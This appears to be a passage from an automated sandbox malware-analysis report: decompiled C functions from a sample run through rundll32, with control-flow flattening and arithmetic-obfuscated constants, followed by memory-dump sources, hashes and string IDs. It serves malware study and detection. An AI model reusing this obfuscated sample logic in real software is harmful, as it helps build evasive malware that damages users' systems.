                                                                                                                      						_v24 = _t280;
                                                                                                                      						if(_t280 != 0) {
                                                                                                                      							_t293 = 0x84b6bf9;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if(_t293 == 0x1b7bba2) {
                                                                                                                      							E002B68DE(_v36, _v44, _v52, _v76, _v24);
                                                                                                                      						} else {
                                                                                                                      							if(_t293 == 0x8150c28) {
                                                                                                                      								_t283 =  *0x2d5c9c; // 0x0
                                                                                                                      								_t285 = E002BAD30( *_t312, 0, _v100, _v132, _v140,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v68, _v108, _v32, _v116, _v144,  *((intOrPtr*)(_t283 + 0x50)), _t293, _t293, _v96, _v48, _v88);
                                                                                                                      								_t318 = _t318 + 0x40;
                                                                                                                      								if(_t285 == _v124) {
                                                                                                                      									_t293 = 0x185c552;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t293 != 0x84b6bf9) {
                                                                                                                      									L13:
                                                                                                                      									if(_t293 != 0x3792bf2) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_t286 =  *0x2d5c9c; // 0x0
                                                                                                                      									_t222 =  &_v128; // 0xe840e3
                                                                                                                      									_t288 = E002BAD30( *_t312, _v24, _v28, _v56, _v40,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v104, _v72, _v20,  *_t222, _v80,  *((intOrPtr*)(_t286 + 0x50)), _t293, _t293, _v64, _v112, _v92);
                                                                                                                      									_t318 = _t318 + 0x40;
                                                                                                                      									if(_t288 == _v136) {
                                                                                                                      										 *_t291 = _v24;
                                                                                                                      										_t310 = 1;
                                                                                                                      										 *((intOrPtr*)(_t291 + 4)) = _v20;
                                                                                                                      									} else {
                                                                                                                      										_t293 = 0x1b7bba2;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t310;
                                                                                                                      				}
                                                                                                                      				_t293 = 0x8150c28;
                                                                                                                      				goto L13;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GWx$xO?$@
                                                                                                                      • API String ID: 0-2177883290
                                                                                                                      • Opcode ID: 3f2437a3d6c5d0c1d2b81094e8fe74c758a5817011b1fc7b5ee23f4776a92d1d
                                                                                                                      • Instruction ID: 7102d67a10afcebcfbdbd18b8be4b16f64350dc94e49cddc11f650d009033285
                                                                                                                      • Opcode Fuzzy Hash: 3f2437a3d6c5d0c1d2b81094e8fe74c758a5817011b1fc7b5ee23f4776a92d1d
                                                                                                                      • Instruction Fuzzy Hash: 38D10DB24183819FD764CF65C989A5BBBF1BBD4748F508A1DF2D986260D7B19908CF02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002BE243() {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				char _v32;
                                                                                                                      				char _v36;
                                                                                                                      				char _v40;
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				intOrPtr _t246;
                                                                                                                      				signed int _t250;
                                                                                                                      				intOrPtr _t256;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				intOrPtr _t262;
                                                                                                                      				signed int _t264;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int _t266;
                                                                                                                      				signed int _t267;
                                                                                                                      				signed int _t268;
                                                                                                                      				signed int _t269;
                                                                                                                      				intOrPtr _t277;
                                                                                                                      				void* _t300;
                                                                                                                      				char _t304;
                                                                                                                      				void* _t305;
                                                                                                                      				void* _t307;
                                                                                                                      
                                                                                                                      				_v20 = 0x755bf0;
                                                                                                                      				_v16 = 0xbb5ee2;
                                                                                                                      				_v12 = 0xb403bb;
                                                                                                                      				_t262 = 0;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v108 = 0x84f903;
                                                                                                                      				_v108 = _v108 << 0xe;
                                                                                                                      				_v108 = _v108 | 0x00052a35;
                                                                                                                      				_v108 = _v108 + 0x3d3f;
                                                                                                                      				_v108 = _v108 ^ 0x3e47d87c;
                                                                                                                      				_v88 = 0x71c3c4;
                                                                                                                      				_v88 = _v88 + 0xffffe131;
                                                                                                                      				_t264 = 0x3b;
                                                                                                                      				_v88 = _v88 / _t264;
                                                                                                                      				_v88 = _v88 ^ 0x40aa9d70;
                                                                                                                      				_t300 = 0xfb124ba;
                                                                                                                      				_v88 = _v88 ^ 0x40a0f61c;
                                                                                                                      				_v52 = 0x7362f6;
                                                                                                                      				_v52 = _v52 | 0xb899219a;
                                                                                                                      				_v52 = _v52 ^ 0xb8f51d59;
                                                                                                                      				_v56 = 0xfd4e8c;
                                                                                                                      				_t265 = 0x71;
                                                                                                                      				_v56 = _v56 * 0x54;
                                                                                                                      				_v56 = _v56 ^ 0x53104169;
                                                                                                                      				_v92 = 0xd5c279;
                                                                                                                      				_v92 = _v92 + 0x8479;
                                                                                                                      				_v92 = _v92 + 0xffffbe38;
                                                                                                                      				_v92 = _v92 / _t265;
                                                                                                                      				_v92 = _v92 ^ 0x0004c231;
                                                                                                                      				_v68 = 0x9eb1ac;
                                                                                                                      				_t266 = 0x4a;
                                                                                                                      				_v68 = _v68 * 0x7b;
                                                                                                                      				_v68 = _v68 << 5;
                                                                                                                      				_v68 = _v68 ^ 0x87ec7921;
                                                                                                                      				_v104 = 0x24a1b7;
                                                                                                                      				_v104 = _v104 << 4;
                                                                                                                      				_v104 = _v104 | 0x0d0d6548;
                                                                                                                      				_t62 =  &_v104; // 0xd0d6548
                                                                                                                      				_v104 =  *_t62 / _t266;
                                                                                                                      				_v104 = _v104 ^ 0x003eb00a;
                                                                                                                      				_v96 = 0x109237;
                                                                                                                      				_v96 = _v96 ^ 0x088082ff;
                                                                                                                      				_v96 = _v96 >> 1;
                                                                                                                      				_v96 = _v96 ^ 0xdcc593d2;
                                                                                                                      				_v96 = _v96 ^ 0xd88ac121;
                                                                                                                      				_v100 = 0xaca53b;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_t267 = 0x53;
                                                                                                                      				_v100 = _v100 * 0x47;
                                                                                                                      				_v100 = _v100 + 0xffff22d9;
                                                                                                                      				_v100 = _v100 ^ 0x0009f7ae;
                                                                                                                      				_v60 = 0xde163e;
                                                                                                                      				_v60 = _v60 + 0xffffe594;
                                                                                                                      				_v60 = _v60 ^ 0x00de9d26;
                                                                                                                      				_v120 = 0x240793;
                                                                                                                      				_v120 = _v120 / _t267;
                                                                                                                      				_v120 = _v120 * 0x19;
                                                                                                                      				_v120 = _v120 + 0xd430;
                                                                                                                      				_v120 = _v120 ^ 0x0006e0c9;
                                                                                                                      				_v124 = 0xc58e86;
                                                                                                                      				_t268 = 0x65;
                                                                                                                      				_v124 = _v124 / _t268;
                                                                                                                      				_v124 = _v124 >> 0xb;
                                                                                                                      				_v124 = _v124 ^ 0x9d14b09a;
                                                                                                                      				_v124 = _v124 ^ 0x9d1ca329;
                                                                                                                      				_v64 = 0xc78ca0;
                                                                                                                      				_v64 = _v64 | 0xd15d632f;
                                                                                                                      				_v64 = _v64 ^ 0xd1d5a42f;
                                                                                                                      				_v128 = 0x79ba0a;
                                                                                                                      				_v128 = _v128 ^ 0x7ce03b8e;
                                                                                                                      				_v128 = _v128 + 0x4723;
                                                                                                                      				_v128 = _v128 >> 0xa;
                                                                                                                      				_v128 = _v128 ^ 0x00126e73;
                                                                                                                      				_v112 = 0x301104;
                                                                                                                      				_v112 = _v112 ^ 0x99cc29f1;
                                                                                                                      				_v112 = _v112 >> 0xb;
                                                                                                                      				_v112 = _v112 << 0xe;
                                                                                                                      				_v112 = _v112 ^ 0xcfe465e8;
                                                                                                                      				_v72 = 0xf18177;
                                                                                                                      				_v72 = _v72 + 0xffff968e;
                                                                                                                      				_v72 = _v72 + 0x6cf6;
                                                                                                                      				_v72 = _v72 ^ 0x00fdce33;
                                                                                                                      				_v76 = 0xd90ee1;
                                                                                                                      				_v76 = _v76 + 0xffffa364;
                                                                                                                      				_v76 = _v76 ^ 0x3c048803;
                                                                                                                      				_v76 = _v76 ^ 0x3cd13d13;
                                                                                                                      				_v116 = 0xc42f7d;
                                                                                                                      				_v116 = _v116 >> 2;
                                                                                                                      				_v116 = _v116 + 0x3407;
                                                                                                                      				_v116 = _v116 >> 7;
                                                                                                                      				_v116 = _v116 ^ 0x0009b6df;
                                                                                                                      				_v48 = 0xe39a19;
                                                                                                                      				_v48 = _v48 | 0x7412591d;
                                                                                                                      				_v48 = _v48 ^ 0x74ffcd98;
                                                                                                                      				_v80 = 0xc90483;
                                                                                                                      				_v80 = _v80 >> 1;
                                                                                                                      				_t269 = 0x17;
                                                                                                                      				_v80 = _v80 / _t269;
                                                                                                                      				_v80 = _v80 * 0x7d;
                                                                                                                      				_v80 = _v80 ^ 0x0220ab71;
                                                                                                                      				_v84 = 0xc67ab0;
                                                                                                                      				_v84 = _v84 >> 0xa;
                                                                                                                      				_v84 = _v84 * 3;
                                                                                                                      				_v84 = _v84 | 0xfb397840;
                                                                                                                      				_v84 = _v84 ^ 0xfb3c3624;
                                                                                                                      				_t304 = _v44;
                                                                                                                      				_t299 = _v44;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t307 = _t300 - 0x73106c8;
                                                                                                                      						if(_t307 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t307 == 0) {
                                                                                                                      							_t250 = E002C026B(_v96,  &_v40,  &_v32, _v100, _v60);
                                                                                                                      							_t305 = _t305 + 0xc;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t300 = ( ~_t250 & 0x022a085a) + 0x44dd11e;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0xc1fb10) {
                                                                                                                      							_t300 = 0xde7de8b;
                                                                                                                      							if(_v44 > 2) {
                                                                                                                      								_t261 = E002C561F(_v68, _v104,  *((intOrPtr*)(_t299 + 8)),  &_v36);
                                                                                                                      								_v40 = _t261;
                                                                                                                      								if(_t261 != 0) {
                                                                                                                      									_t300 = 0x73106c8;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0x37ef4f2) {
                                                                                                                      							_t304 = E002CE35A();
                                                                                                                      							_t300 = 0xc8dd531;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0x44dd11e) {
                                                                                                                      							E002B68DE(_v112, _v72, _v76, _v116, _v40);
                                                                                                                      							_t305 = _t305 + 0xc;
                                                                                                                      							_t300 = 0xde7de8b;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 != 0x677d978) {
                                                                                                                      							goto L21;
                                                                                                                      						} else {
                                                                                                                      							_t256 =  *0x2d520c; // 0x0
                                                                                                                      							E002BF4BD(_v120, _v124, _t256 + 0x220, _v64, _v28, _v24 + 1, _v128);
                                                                                                                      							_t277 =  *0x2d520c; // 0x0
                                                                                                                      							_t305 = _t305 + 0x14;
                                                                                                                      							_t262 = 1;
                                                                                                                      							_t300 = 0x44dd11e;
                                                                                                                      							 *((intOrPtr*)(_t277 + 0x210)) = _v32;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					if(_t300 == 0xc8dd531) {
                                                                                                                      						_t246 = E002BBC8A(_v88, _v52,  &_v44, _t304, _v56, _v92);
                                                                                                                      						_t299 = _t246;
                                                                                                                      						_t305 = _t305 + 0x10;
                                                                                                                      						if(_t246 == 0) {
                                                                                                                      							_t300 = 0xa73b483;
                                                                                                                      							goto L21;
                                                                                                                      						}
                                                                                                                      						_t300 = 0xc1fb10;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t300 == 0xde7de8b) {
                                                                                                                      						E002BFFF2(_v48, _v80, _v84, _t299);
                                                                                                                      						L24:
                                                                                                                      						return _t262;
                                                                                                                      					}
                                                                                                                      					if(_t300 != 0xfb124ba) {
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      					_t300 = 0x37ef4f2;
                                                                                                                      					goto L1;
                                                                                                                      					L21:
                                                                                                                      				} while (_t300 != 0xa73b483);
                                                                                                                      				goto L24;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #G$?=$He
                                                                                                                      • API String ID: 0-2298667298
                                                                                                                      • Opcode ID: ef7affb56cd6928006716878bc3ab04bd882b114627b2970bafb45466a1ed62f
                                                                                                                      • Instruction ID: 2c20ec20db85d09b3e4059e2502aad8a3a7a18b57d186902ff259f542b460f2c
                                                                                                                      • Opcode Fuzzy Hash: ef7affb56cd6928006716878bc3ab04bd882b114627b2970bafb45466a1ed62f
                                                                                                                      • Instruction Fuzzy Hash: A7C162B28183409FC768CF65C48A48BFBE1FBC4398F51892DF59686260D7B1D959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002B911A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v52;
                                                                                                                      				void* _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				char _v112;
                                                                                                                      				intOrPtr _v144;
                                                                                                                      				intOrPtr _v148;
                                                                                                                      				char _v156;
                                                                                                                      				char _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				void* _t162;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t184;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t200;
                                                                                                                      				void* _t202;
                                                                                                                      				intOrPtr _t207;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				void* _t235;
                                                                                                                      				void* _t236;
                                                                                                                      				void* _t238;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t162);
                                                                                                                      				_v68 = 0x6e7241;
                                                                                                                      				_t236 = _t235 + 0x10;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t198 = 0;
                                                                                                                      				_t200 = 0x513154f;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t231 = 0x5b;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v208 = 0x6dc976;
                                                                                                                      				_v208 = _v208 + 0xffff97e7;
                                                                                                                      				_v208 = _v208 << 0xf;
                                                                                                                      				_v208 = _v208 + 0xffff3ee4;
                                                                                                                      				_v208 = _v208 ^ 0xb0a037f9;
                                                                                                                      				_v216 = 0xefa27a;
                                                                                                                      				_v216 = _v216 * 0x2d;
                                                                                                                      				_v216 = _v216 << 0xe;
                                                                                                                      				_v216 = _v216 + 0x5c30;
                                                                                                                      				_v216 = _v216 ^ 0xe3d2b40e;
                                                                                                                      				_v192 = 0xd4fef0;
                                                                                                                      				_v192 = _v192 / _t231;
                                                                                                                      				_v192 = _v192 << 9;
                                                                                                                      				_v192 = _v192 ^ 0x04a09c26;
                                                                                                                      				_v172 = 0xfabcfe;
                                                                                                                      				_v172 = _v172 + 0xadb7;
                                                                                                                      				_v172 = _v172 ^ 0x00f6fe01;
                                                                                                                      				_v224 = 0xb5a285;
                                                                                                                      				_t232 = 0x43;
                                                                                                                      				_v224 = _v224 * 0x7a;
                                                                                                                      				_v224 = _v224 >> 1;
                                                                                                                      				_v224 = _v224 | 0x4641179d;
                                                                                                                      				_v224 = _v224 ^ 0x6f41a140;
                                                                                                                      				_v212 = 0x80e1bd;
                                                                                                                      				_v212 = _v212 / _t232;
                                                                                                                      				_v212 = _v212 << 9;
                                                                                                                      				_v212 = _v212 >> 0xc;
                                                                                                                      				_v212 = _v212 ^ 0x0005f6ff;
                                                                                                                      				_v220 = 0x3f6ee7;
                                                                                                                      				_v220 = _v220 >> 5;
                                                                                                                      				_v220 = _v220 << 0xf;
                                                                                                                      				_v220 = _v220 | 0x5ccf7ed2;
                                                                                                                      				_v220 = _v220 ^ 0xfdf08ccb;
                                                                                                                      				_v188 = 0x96b178;
                                                                                                                      				_v188 = _v188 * 0x33;
                                                                                                                      				_v188 = _v188 << 7;
                                                                                                                      				_v188 = _v188 ^ 0x02ac94c8;
                                                                                                                      				_v196 = 0x862d42;
                                                                                                                      				_v196 = _v196 | 0x17619c21;
                                                                                                                      				_v196 = _v196 ^ 0x73c665d7;
                                                                                                                      				_v196 = _v196 ^ 0x642dc428;
                                                                                                                      				_v176 = 0xd9c085;
                                                                                                                      				_v176 = _v176 | 0xddbc98a5;
                                                                                                                      				_v176 = _v176 ^ 0xddfc0835;
                                                                                                                      				_v180 = 0xc6bbdd;
                                                                                                                      				_v180 = _v180 * 0x34;
                                                                                                                      				_v180 = _v180 ^ 0x2850aa5e;
                                                                                                                      				_v168 = 0x548f7e;
                                                                                                                      				_v168 = _v168 << 2;
                                                                                                                      				_v168 = _v168 ^ 0x015ffca1;
                                                                                                                      				_v204 = 0x6ca805;
                                                                                                                      				_v204 = _v204 + 0x3ad1;
                                                                                                                      				_v204 = _v204 * 0x44;
                                                                                                                      				_v204 = _v204 ^ 0x1ce18dde;
                                                                                                                      				_v184 = 0x9ecbae;
                                                                                                                      				_v184 = _v184 << 5;
                                                                                                                      				_v184 = _v184 ^ 0x13d028d8;
                                                                                                                      				_t233 = _v184;
                                                                                                                      				_v200 = 0xbd8de1;
                                                                                                                      				_v200 = _v200 + 0xffffb408;
                                                                                                                      				_v200 = _v200 | 0x119192b9;
                                                                                                                      				_v200 = _v200 ^ 0x11b45be6;
                                                                                                                      				while(1) {
                                                                                                                      					_t238 = _t200 - 0x8a8a415;
                                                                                                                      					if(_t238 <= 0) {
                                                                                                                      					}
                                                                                                                      					L2:
                                                                                                                      					if(_t238 == 0) {
                                                                                                                      						_t176 = E002BCA43( &_v164, _v196, _v176, _v180,  &_v156, _v168);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t200 = ( ~_t176 & 0x03566572) + 0x6fcaad9;
                                                                                                                      						continue;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								_t238 = _t200 - 0x8a8a415;
                                                                                                                      								if(_t238 <= 0) {
                                                                                                                      								}
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      							L45:
                                                                                                                      							__eflags = _t200 - 0x409adf;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						L46:
                                                                                                                      						return _t198;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x1cefc96) {
                                                                                                                      						__eflags = _v148 - 1;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E002B472E( &_v112);
                                                                                                                      							L16:
                                                                                                                      							_t200 = 0xdce0ab1;
                                                                                                                      							while(1) {
                                                                                                                      								_t238 = _t200 - 0x8a8a415;
                                                                                                                      								if(_t238 <= 0) {
                                                                                                                      								}
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t200 = 0x6447723;
                                                                                                                      						while(1) {
                                                                                                                      							_t238 = _t200 - 0x8a8a415;
                                                                                                                      							if(_t238 <= 0) {
                                                                                                                      							}
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						goto L2;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x26bd5bb) {
                                                                                                                      						__eflags = _v148 - 6;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E002CA429( &_v112);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0xcc2cd30;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x513154f) {
                                                                                                                      						E002C64C5(_v208, _v216, _v192, _v172, _a4,  &_v52);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						_t200 = 0x7b50d2c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x6447723) {
                                                                                                                      						__eflags = _v148 - 2;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E002C5040( &_v112, _t233);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x92d00b6;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x6fcaad9) {
                                                                                                                      						_t184 = E002CB9B1(_v224, _v212, __eflags,  &_v164, _v220,  &_v52, _v188);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						__eflags = _t184;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							goto L46;
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						_t200 = 0x8a8a415;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 != 0x7b50d2c) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					E002B6A1F(0);
                                                                                                                      					L10:
                                                                                                                      					_t200 = 0x6fcaad9;
                                                                                                                      					continue;
                                                                                                                      					L25:
                                                                                                                      					__eflags = _t200 - 0x92d00b6;
                                                                                                                      					if(_t200 == 0x92d00b6) {
                                                                                                                      						__eflags = _v148 - 3;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E002B88F4( &_v112);
                                                                                                                      							_t200 = 0xdce0ab1;
                                                                                                                      							goto L45;
                                                                                                                      						}
                                                                                                                      						_t200 = 0xe60179d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xa53104b;
                                                                                                                      					if(_t200 == 0xa53104b) {
                                                                                                                      						_push(_t200);
                                                                                                                      						_push(_t200);
                                                                                                                      						_t202 = 0x44;
                                                                                                                      						_t233 = E002C3512(_t202);
                                                                                                                      						__eflags = _t233;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x1cefc96;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x20)) = _v100;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x40)) = _v144;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x34)) = _v92;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xc419b15;
                                                                                                                      					if(_t200 == 0xc419b15) {
                                                                                                                      						__eflags = _v148 - 5;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E002C0946( &_v112, _t233);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x26bd5bb;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xcc2cd30;
                                                                                                                      					if(_t200 == 0xcc2cd30) {
                                                                                                                      						__eflags = _v148 - 7;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E002B7B82( &_v112);
                                                                                                                      						}
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xdce0ab1;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t207 =  *0x2d5c94; // 0x0
                                                                                                                      						_t198 = _t198 + 1;
                                                                                                                      						 *_t233 =  *(_t207 + 0x230);
                                                                                                                      						 *(_t207 + 0x230) = _t233;
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xe60179d;
                                                                                                                      					if(_t200 != 0xe60179d) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					__eflags = _v148 - 4;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						E002B2FA1( &_v112);
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					_t200 = 0xc419b15;
                                                                                                                      				}
                                                                                                                      			}









































                                                                                                                      0x002b94e6
                                                                                                                      0x002b94d5
                                                                                                                      0x002b94d5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0\$Arn$n?
                                                                                                                      • API String ID: 0-1422779782
                                                                                                                      • Opcode ID: 166467aa451e8a9f63ff9014267a9b20bf73d58f2be751d5b273afdc123971c5
                                                                                                                      • Instruction ID: d8b488f79cd7caea563004935d98e46b3de213486e8ade1328229bc461a81e29
                                                                                                                      • Opcode Fuzzy Hash: 166467aa451e8a9f63ff9014267a9b20bf73d58f2be751d5b273afdc123971c5
                                                                                                                      • Instruction Fuzzy Hash: A1B15770528341DBC368CF24C4A95AFBBE1FBC4388F544A1EF686962A0D7719999CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002BBD0F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v16;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				char _v52;
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				char _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t226;
                                                                                                                      				char* _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t234;
                                                                                                                      				intOrPtr _t242;
                                                                                                                      				intOrPtr* _t247;
                                                                                                                      				void* _t249;
                                                                                                                      				intOrPtr _t250;
                                                                                                                      				void* _t289;
                                                                                                                      				intOrPtr* _t291;
                                                                                                                      				signed int _t292;
                                                                                                                      				signed int _t293;
                                                                                                                      				signed int _t294;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t297;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int* _t301;
                                                                                                                      
                                                                                                                      				_t291 = _a4;
                                                                                                                      				_t247 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_t291);
